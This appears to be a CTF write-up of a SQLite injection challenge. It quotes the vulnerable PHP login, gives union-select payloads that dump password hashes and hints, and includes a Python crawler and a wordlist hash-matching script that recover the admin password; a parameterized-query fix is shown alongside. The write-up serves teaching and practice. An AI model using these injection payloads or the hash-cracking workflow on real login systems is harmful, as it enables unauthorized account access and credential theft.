```php
<?php
if (isset($_POST['usr']) && isset($_POST['pw'])) {
    $user = $_POST['usr'];
    $pass = $_POST['pw'];
    $db = new SQLite3('../fancy.db');
    $res = $db->query("SELECT id,name from Users where name='" . $user . "' and password='" . sha1($pass . "Salz!") . "'");
    if ($res) {
        $row = $res->fetchArray();
    } else {
        echo "<br>Some Error occourred!";
    }
    if (isset($row['id'])) {
        setcookie('name', ' ' . $row['name'], time() + 60, '/');
        header("Location: /");
        die();
    }
}
if (isset($_GET['debug']))
    highlight_file('login.php');
?>
```
The two key lines of code:
```php
$res = $db->query("SELECT id,name from Users where name='" . $user . "' and password='" . sha1($pass . "Salz!") . "'");
setcookie('name', ' ' . $row['name'], time() + 60, '/');
```
So whatever the query returns in the name column ends up in the cookie.
A note on SQLite to fill in the background: SQLite has a sqlite_master table (the global schema table, which stores the definitions of all tables, views, indexes, triggers, etc. in the database), and the SQL definitions of the user tables can be read from it.
From it we get the Users table, with the fields id, name, password, hint.
Query the password:
```sql
' union select name,password from Users--
```
This gives 3fab54a50e770d830c0416df817567662a9dc85c, which should be the result of sha1($pass."Salz!").
Here I can happily tell you that some hash-lookup websites can reverse this.
Accessing admin.php directly, the login password is ThinJerboa.
This is the unintended solution.
The intended solution is below.
Query the hint:
```sql
' union select name,hint from Users--
```
my fav word in my fav paper?!
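As an added example (not part of the original writeup, and not the challenge's own code), the following Python script builds an in-memory SQLite database with the Users schema recovered above, reads the table definition back from sqlite_master, and contrasts the concatenated query from login.php with a parameterized one. The union input quoted above makes the concatenated query return a row whose second column is the password hash (which login.php would then copy into the cookie), while the bound-parameter version treats the same input as a literal username and returns nothing. The row contents and the sample password "example-pw" are constructed for this example.

```python
import hashlib
import sqlite3

SALT = "Salz!"  # the suffix login.php appends before hashing (from the page)


def salted_sha1(pw):
    """sha1($pass."Salz!") as login.php computes it."""
    return hashlib.sha1((pw + SALT).encode()).hexdigest()


def make_db():
    """In-memory stand-in for fancy.db. The column layout (id, name, password,
    hint) is the one the writeup recovered; the row values are constructed."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users(id INTEGER PRIMARY KEY, name TEXT, "
               "password TEXT, hint TEXT)")
    db.execute("INSERT INTO Users(name, password, hint) VALUES (?, ?, ?)",
               ("admin", salted_sha1("example-pw"), "my fav word in my fav paper?!"))
    db.commit()
    return db


def table_definitions(db):
    """Read the CREATE statements of all user tables from sqlite_master."""
    return [sql for (sql,) in
            db.execute("SELECT sql FROM sqlite_master WHERE type='table'")]


def login_concat(db, user, pw):
    """Mirrors login.php: the SQL text is built by string concatenation, so
    the username is parsed as SQL, not as data."""
    q = ("SELECT id,name from Users where name='" + user +
         "' and password='" + salted_sha1(pw) + "'")
    return db.execute(q).fetchone()


def login_param(db, user, pw):
    """Hardened form: user input is bound as a parameter and can only ever be
    compared as a string value."""
    q = "SELECT id, name FROM Users WHERE name = ? AND password = ?"
    return db.execute(q, (user, salted_sha1(pw))).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(table_definitions(db))
    payload = "' union select name,password from Users--"
    print("concatenated:", login_concat(db, payload, "anything"))
    print("parameterized:", login_param(db, payload, "anything"))
    print("real login:", login_param(db, "admin", "example-pw"))
```

The only difference between the two login functions is where the username goes: into the SQL string, or into the parameter tuple. With bound parameters the query shape is fixed before any user data is seen, which is why the same input cannot add a UNION.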
So the password should be in one of the papers on the site. Two days ago I was lamenting that there was no time to practice Python; here is the opportunity.
First crawl all the files.
Code:
```python
import os
import re

import requests

re1 = r'[a-fA-F0-9]{32}\.pdf'     # regex matching the hex-named pdf files
re2 = r'[0-9/]{2}index.html'       # regex matching links such as 1/index.html
pdf_list = []


def get_pdf(url):
    """Collect the pdf links on a page, then recurse into every n/index.html it links to."""
    global pdf_list
    print(url)
    req = requests.get(url).text       # the page body as decoded text
    re_pdf = re.findall(re1, req)      # all pdf file names on this page
    for index in re_pdf:
        pdf_url = url + index
        pdf_list.append(pdf_url)
    # The catch in this challenge: more pdf files live on other pages,
    # so visit each linked page and collect its pdfs as well.
    re_html = re.findall(re2, req)
    for j in re_html:                  # visit the 1/, 2/, ... pages in turn
        new_url = url + j[0:2]         # slice: keep only "1/" from "1/index.html"
        print(new_url)
        get_pdf(new_url)
    return pdf_list


def download(i, url):
    file_name = str(i) + '.pdf'
    req = requests.get(url)
    os.makedirs('pdf', exist_ok=True)  # save into a local pdf/ directory (the original used a fixed Windows path)
    with open(os.path.join('pdf', file_name), 'wb') as f:
        f.write(req.content)           # .content is the raw bytes of the HTTP body
    print('Successfully downloaded ' + file_name)


if __name__ == '__main__':
    pdf_list = get_pdf('http://111.200.241.244:41641/')
    for i in range(len(pdf_list)):
        download(i, pdf_list[i])
```
Above is the code to download all the pdf files.
Tested, it works.
The next step uses a script from an expert (not my own):
```python
# Python 3 port of the original Python 2 script (cStringIO, print statements).
from io import StringIO
import hashlib
import os

from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.pdfpage import PDFPage

TARGET = '3fab54a50e770d830c0416df817567662a9dc85c'   # hash dumped via the union query


def get_pdf():
    """All pdf files in the current directory."""
    return [i for i in os.listdir("./") if i.endswith("pdf")]


def convert_pdf_2_text(path):
    """Extract the text of one pdf with pdfminer."""
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, 'rb') as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
        text = retstr.getvalue()
    device.close()
    retstr.close()
    return text


def find_password():
    """Hash every word of every pdf with the "Salz!" suffix and compare against the target."""
    for i in get_pdf():
        print("Searching word in " + i)
        for word in convert_pdf_2_text(i).split():
            sha1_password = hashlib.sha1((word + "Salz!").encode()).hexdigest()
            if sha1_password == TARGET:
                print("Find the password : " + word)
                return word
    return None


if __name__ == "__main__":
    find_password()
```
Running it gives the password; logging in to the admin account with it yields the flag.